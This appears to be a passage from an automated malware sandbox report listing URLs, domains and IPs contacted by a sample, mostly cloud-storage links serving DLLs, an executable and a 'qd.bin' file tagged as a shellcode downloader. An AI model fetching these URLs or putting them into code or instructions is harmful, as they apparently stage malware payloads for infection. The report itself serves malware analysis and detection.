https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dlld0%Avira URL Cloudsafe
https://res.ldmnq.com/ld/leidianexmnq5mnq9https://res.ldmnq.com/download/release/ldinst9.0.exeldmnq90%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dTCh0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllCom0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dllTCh0%Avira URL Cloudsafe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binShellcodeDownloadererrorerrorerror0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll7SH0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlldTCh0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exe0%Avira URL Cloudsafe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/$p0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllTCh0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$p0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$q0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqc0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllZR0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sgp.file.myqcloud.com
43.152.64.193
truefalse
    unknown
    gz.file.myqcloud.com
    159.75.57.35
    truefalse
      unknown
      www80-1323570959.cos.ap-singapore.myqcloud.com
      unknown
      unknownfalse
        unknown
        wwwdll-1323570959.cos.ap-singapore.myqcloud.com
        unknown
        unknownfalse
          unknown
          wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exefalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dllfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exeLLisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dllRLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll9RBLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dlluRLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dLisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/DpLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/DqLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/4pLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www80-1323570959.cos.ap-singapore.myqcloud.com/&#_LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.0000000000989000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.0000000000989000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldllLisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://HTTP/1.1QT2[1].exe.0.dr, software.exe.0.drfalse
            • Avira URL Cloud: safe
            unknown
            https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/dpLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldllTChLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322734496.0000000000966000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/jLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/dpLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/TpLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.aLisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllFMLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.ijg.orgcximagecrt[1].dll.0.dr, cximagecrt.dll.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlloLisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/TpLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/TqLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://cacerts.diLisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldLisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www80-1323570959.cos.ap-singapore.myqcloud.com/LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000097C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/jLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dlldLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://res.ldmnq.com/ld/leidianexmnq5mnq9https://res.ldmnq.com/download/release/ldinst9.0.exeldmnq9QT2[1].exe.0.dr, software.exe.0.drfalse
                • Avira URL Cloud: safe
                unknown
                http://upx.sf.netAmcache.hve.8.drfalse
                • URL Reputation: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dllTChLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dTChLisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllComLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binShellcodeDownloadererrorerrorerrorLisectAVT_2403002B_78.exefalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlldTChLisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/tqLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll7SHLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/$pLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllTChLisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$pLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$qLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wwwdll-1323570959.cos.ap-singapore.myqcLisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wwwdll-1323570959.cos.apLisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllZRLisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
